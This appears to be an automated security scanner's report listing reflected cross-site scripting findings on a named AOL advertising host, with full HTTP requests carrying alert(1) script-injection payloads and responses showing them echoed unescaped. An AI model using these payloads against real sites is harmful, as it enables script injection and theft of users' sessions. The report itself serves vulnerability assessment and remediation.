Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites8956f"-alert(1)-"64c6c38375d/all/modules/pollfield/pollfield.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilte
...[SNIP]...
4.272. http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/pollfield/pollfield.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d86fc"><script>alert(1)</script>4611b9dbb75 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesd86fc"><script>alert(1)</script>4611b9dbb75/all/modules/pollfield/pollfield.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:42 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:42 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sitesd86fc"><script>alert(1)</script>4611b9dbb75/all/modules/pollfield/pollfield.css?7" />
...[SNIP]...
4.273. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac7a0"><script>alert(1)</script>f633ef2646d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sitesac7a0"><script>alert(1)</script>f633ef2646d/all/modules/views/css/views.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:58 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:59 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sitesac7a0"><script>alert(1)</script>f633ef2646d/all/modules/views/css/views.css?7" />
...[SNIP]...
4.274. http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 89ce3"-alert(1)-"5b1c49a60d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites89ce3"-alert(1)-"5b1c49a60d2/all/modules/views/css/views.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:08 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:08 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13498

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites89ce3"-alert(1)-"5b1c49a60d2/all/modules/views/css/views.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="
...[SNIP]...
4.275. http://nai.glb.adtechus.com/sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1014a"-alert(1)-"f8d1e8ac0da was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites1014a"-alert(1)-"f8d1e8ac0da/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:11 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:11 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites1014a"-alert(1)-"f8d1e8ac0da/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s
...[SNIP]...
4.276. http://nai.glb.adtechus.com/sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92ba8"><script>alert(1)</script>0ee94641d05 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites92ba8"><script>alert(1)</script>0ee94641d05/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:38:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:38:02 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13776

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites92ba8"><script>alert(1)</script>0ee94641d05/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css?7" />
...[SNIP]...
4.277. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/aolad/css/screen.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58d7f"><script>alert(1)</script>a7305042597 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites58d7f"><script>alert(1)</script>a7305042597/all/themes/zen/aolad/css/screen.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:36:33 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:36:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites58d7f"><script>alert(1)</script>a7305042597/all/themes/zen/aolad/css/screen.css?7" />
...[SNIP]...
4.278. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/aolad/css/screen.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb72e"-alert(1)-"ba9325f0e19 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sitesbb72e"-alert(1)-"ba9325f0e19/all/themes/zen/aolad/css/screen.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:36:36 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:36:36 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
65=s_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sitesbb72e"-alert(1)-"ba9325f0e19/all/themes/zen/aolad/css/screen.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilte
...[SNIP]...
4.279. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/aolad/css/screen.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc129"-alert(1)-"57f320b0f89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allbc129"-alert(1)-"57f320b0f89/themes/zen/aolad/css/screen.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:07 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:07 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
_gi('aolamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites/allbc129"-alert(1)-"57f320b0f89/themes/zen/aolad/css/screen.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="
...[SNIP]...
4.280. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/aolad/css/screen.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab5d0"><script>alert(1)</script>42db3020f92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/allab5d0"><script>alert(1)</script>42db3020f92/themes/zen/aolad/css/screen.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:04 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites/allab5d0"><script>alert(1)</script>42db3020f92/themes/zen/aolad/css/screen.css?7" />
...[SNIP]...
4.281. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/aolad/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ed59a"-alert(1)-"41c38c6af7f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all/themesed59a"-alert(1)-"41c38c6af7f/zen/aolad/css/screen.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:55 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:55 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
lamn,aolsvc');
   s_265.linkTrackVars='evar1,events,products';
   s_265.linkTrackEvents='prodView';
   s_265.events="prodView";
   s_265.products='aolad;aolad simple contact;;';
   s_265.eVar1="/sites/all/themesed59a"-alert(1)-"41c38c6af7f/zen/aolad/css/screen.css?7";
   s_265.tl(this,'o','aol ad simple contact');
}

function runOmni()
{
s_265.pfxID="adv";
s_265.pageName="Main";
s_265.channel="us.aolad";
s_265.linkInternalFilters="javascr
...[SNIP]...
4.282. http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://nai.glb.adtechus.com
Path:   /sites/all/themes/zen/aolad/css/screen.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cde6f"><script>alert(1)</script>ee50a26639c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sites/all/themescde6f"><script>alert(1)</script>ee50a26639c/zen/aolad/css/screen.css?7 HTTP/1.1
Host: nai.glb.adtechus.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nai.glb.adtechus.com/nai/daa.php7f0ce%22-alert(document.location)-%22a235be901d?action_id=3&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=5582481
Cookie: JEB2=NOID; OptOut=we will not set any more cookies; SESS0230649152a3c9f1f18360b4f3975e3c=1c856c1bcda2b173dfe396a05cf7a236

Response

HTTP/1.1 404 Not Found
Date: Sat, 17 Sep 2011 17:37:49 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 17 Sep 2011 17:37:50 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Content-Length: 13584

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<m
...[SNIP]...
<link rel="canonical" href="http://nai.glb.adtechus.com/sites/all/themescde6f"><script>alert(1)</script>ee50a26639c/zen/aolad/css/screen.css?7" />
...[SNIP]...
